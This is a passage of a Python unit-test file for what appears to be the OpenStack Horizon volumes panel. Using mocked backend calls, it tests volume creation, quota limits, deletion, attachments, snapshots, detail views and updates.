self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def test_create_volume_from_image_under_image_size(self):
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 1, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
msg = ("The volume size cannot be less than the "
"image size (20.0\xa0GB)")
self.assertFormError(res, 'form', None, msg)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_type_default',
'group_list'],
})
def _test_create_volume_from_image_under_image_min_disk_size(self, image):
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 5, 'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"image minimum disk size (30GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_image_get.assert_called_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
def test_create_volume_from_image_under_image_min_disk_size(self):
image = self.images.get(name="protected_images")
image.min_disk = 30
self._test_create_volume_from_image_under_image_min_disk_size(image)
def test_create_volume_from_image_under_image_prop_min_disk_size_v2(self):
image = self.imagesV2.get(name="protected_images")
self._test_create_volume_from_image_under_image_min_disk_size(image)
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_gb_used_over_alloted_quota(self):
formData = {'name': 'This Volume Is Huge!',
'description': 'This is a volume that is just too big!',
'method': 'CreateForm',
'size': 5000}
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes', 6))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 80)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['A volume of 5000GiB cannot be created as you only'
' have 20GiB of your quota available.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_volume_list.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.assertEqual(2, self.mock_tenant_quota_usages.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_snapshot_list',
'group_list'],
})
def test_create_volume_number_over_alloted_quota(self):
formData = {'name': 'Too Many...',
'description': 'We have no volumes left!',
'method': 'CreateForm',
'size': 10}
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('volumes',
len(self.cinder_volumes.list())))
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = usage_limit
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
expected_error = ['You are already using all of your available'
' volumes.']
self.assertEqual(res.context['form'].errors['__all__'], expected_error)
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.assertEqual(2, self.mock_availability_zone_list.call_count)
self.mock_volume_snapshot_list.assert_called_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_extension_supported.assert_called_with(test.IsHttpRequest(),
'AvailabilityZones')
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume_with_group(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
volume_group = self.cinder_groups.list()[0]
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az,
'group': volume_group.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = self.cinder_groups.list()
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=volume_group.id, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_delete',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_delete_volume(self):
volumes = self.cinder_volumes.list()
volume = self.cinder_volumes.first()
formData = {'action':
'volumes__delete__%s' % volume.id}
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertIn("Scheduled deletion of Volume: Volume name",
[m.message for m in res.context['messages']])
self.mock_volume_list_paged.assert_called_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.assertEqual(2, self.mock_volume_snapshot_list.call_count)
self.mock_volume_delete.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_server_list.assert_called_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_delete_volume_with_snap_no_action_item(self, mock_get,
mock_limits,
mock_quotas):
volume = self.cinder_volumes.get(name='Volume name')
setattr(volume, 'has_snapshot', True)
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
self.assertNotContains(res, 'Delete Volume')
self.assertNotContains(res, 'delete')
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments(self, mock_get, mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
# Asserting length of 2 accounts for the one instance option,
# and the one 'Choose Instance' option.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
@override_settings(OPENSTACK_HYPERVISOR_FEATURES={'can_set_mount_point':
True})
def test_edit_attachments_auto_device_name(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
"attachment_id": ATTACHMENT_ID,
'instance': servers[0],
'device': '',
'server_id': servers[0].id}]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.TextInput)
self.assertFalse(form.fields['device'].required)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_cannot_set_mount_point(self, mock_get,
mock_server_list):
volume = self.cinder_volumes.first()
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertIsInstance(form.fields['device'].widget,
widgets.HiddenInput)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(api.nova, 'server_list')
@mock.patch.object(cinder, 'volume_get')
def test_edit_attachments_attached_volume(self, mock_get,
mock_server_list):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
mock_get.return_value = volume
mock_server_list.return_value = [servers, False]
url = reverse('horizon:project:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields['instance'].choices),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_server_list.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_attributes(self, mock_get,
mock_limits,
mock_quotas):
limits = {'maxTotalSnapshots': 2}
limits['totalSnapshotsUsed'] = 1
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertNotIn('disabled', content)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_create_snapshot_button_disabled_when_quota_exceeded(
self, mock_get, mock_limits, mock_quotas):
limits = {'maxTotalSnapshots': 1}
limits['totalSnapshotsUsed'] = limits['maxTotalSnapshots']
volume = self.cinder_volumes.first()
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
res_url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(res_url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
action_name = ('%(table)s__row_%(id)s__action_%(action)s' %
{'table': 'volumes', 'id': volume.id,
'action': 'snapshots'})
content = res.content.decode('utf-8')
self.assertIn(action_name, content)
self.assertIn('Create Snapshot (Quota exceeded)', content)
self.assertIn(reverse('horizon:project:volumes:create_snapshot',
args=[volume.id]),
content)
self.assertIn('disabled', content,
'The create snapshot button should be disabled')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_attributes(self):
limits = self.cinder_limits['absolute']
limits['maxTotalVolumes'] = 10
limits['totalVolumesUsed'] = 1
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertEqual(set(['ajax-modal', 'ajax-update', 'btn-create']),
set(create_action.classes))
self.assertEqual('Create Volume', create_action.verbose_name)
self.assertEqual('horizon:project:volumes:create', create_action.url)
self.assertEqual((('volume', 'volume:create'),),
create_action.policy_rules)
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), sort_dir='desc', marker=None,
paginate=True, search_opts=None)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits'],
})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
volumes = self.cinder_volumes.list()
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
volumes = res.context['volumes_table'].data
self.assertCountEqual(volumes, self.cinder_volumes.list())
create_action = self.getAndAssertTableAction(res, 'volumes', 'create')
self.assertIn('disabled', create_action.classes,
'The create button should be disabled')
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
paginate=True, sort_dir='desc',
search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(9, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['volume_snapshot_list',
'volume_get',
'tenant_absolute_limits'],
})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_server_get.assert_called_once_with(test.IsHttpRequest(),
server.id)
self.mock_tenant_absolute_limits.assert_called_once()
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_encrypted(self, mock_get, mock_encryption):
enc_meta = self.cinder_volume_encryption.first()
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.volume_type, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.provider, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.control_location, 1,
200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.cipher, 1, 200)
self.assertContains(res, "<dd>%s</dd>" % enc_meta.key_size, 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(cinder, 'volume_get_encryption_metadata')
@mock.patch.object(cinder, 'volume_get')
def test_encryption_detail_view_unencrypted(self, mock_get,
mock_encryption):
enc_meta = self.cinder_volume_encryption.list()[1]
volume = self.cinder_volumes.get(name='my_volume2')
mock_encryption.return_value = enc_meta
mock_get.return_value = volume
url = reverse('horizon:project:volumes:encryption_detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res,
"Volume Encryption Details: %s" % volume.name,
2, 200)
self.assertContains(res, "<h3>Volume is Unencrypted</h3>", 1, 200)
self.assertNoMessages()
mock_encryption.assert_called_once_with(test.IsHttpRequest(),
volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_get_data(self, mock_get, mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
mock_get.return_value = volume
mock_limits.return_value = self.cinder_limits['absolute']
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertEqual(volume.name, volume.id)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
api.nova: ['server_get'],
cinder: ['tenant_absolute_limits',
'volume_get',
'volume_snapshot_list'],
})
def test_detail_view_snapshot_tab(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
snapshots = self.cinder_volume_snapshots.list()
this_volume_snapshots = [snapshot for snapshot in snapshots
if snapshot.volume_id == volume.id]
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
self.mock_volume_get.return_value = volume
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
self.mock_volume_snapshot_list.return_value = this_volume_snapshots
url = '?'.join([reverse(DETAIL_URL, args=[volume.id]),
'='.join(['tab', 'volume_details__snapshots_tab'])])
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertEqual(len(res.context['table'].data),
len(this_volume_snapshots))
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once()
@test.create_mocks({cinder: ['volume_get',
'message_list',
'volume_snapshot_list',
'tenant_absolute_limits']})
def test_detail_view_with_messages_tab(self):
volume = self.cinder_volumes.first()
messages = [msg for msg in self.cinder_messages.list()
if msg.resource_type == 'VOLUME']
snapshots = self.cinder_volume_snapshots.list()
self.mock_volume_get.return_value = volume
self.mock_message_list.return_value = messages
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse(DETAIL_URL, args=[volume.id])
detail_view = tabs.VolumeDetailTabs(self.request)
messages_tab_link = "?%s=%s" % (
detail_view.param_name,
detail_view.get_tab("messages_tab").get_id())
url += messages_tab_link
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertContains(res, messages[0].user_message)
self.assertContains(res, messages[1].user_message)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once_with(
test.IsHttpRequest())
search_opts = {'resource_type': 'volume',
'resource_uuid': volume.id}
self.mock_message_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=search_opts)
@mock.patch.object(cinder, 'volume_get')
def test_detail_view_with_exception(self, mock_get):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
mock_get.side_effect = self.exceptions.cinder
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(
test.IsHttpRequest(), volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name, volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_without_name(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': '',
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, '', volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_bootable_flag(self):
volume = self.cinder_bootable_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': 'update bootable flag',
'bootable': True}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name,
'update bootable flag')
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, True)
@mock.patch.object(api.glance, 'get_image_schemas')
@mock.patch.object(cinder, 'volume_upload_to_image')
@mock.patch.object(cinder, 'volume_get')
def test_upload_to_image(self, mock_get, mock_upload, mock_schemas_list):
volume = self.cinder_volumes.get(name='v2_volume')
loaded_resp = {'container_format': 'bare',
'disk_format': 'raw',
'id': '741fe2ac-aa2f-4cec-82a9-4994896b43fb',
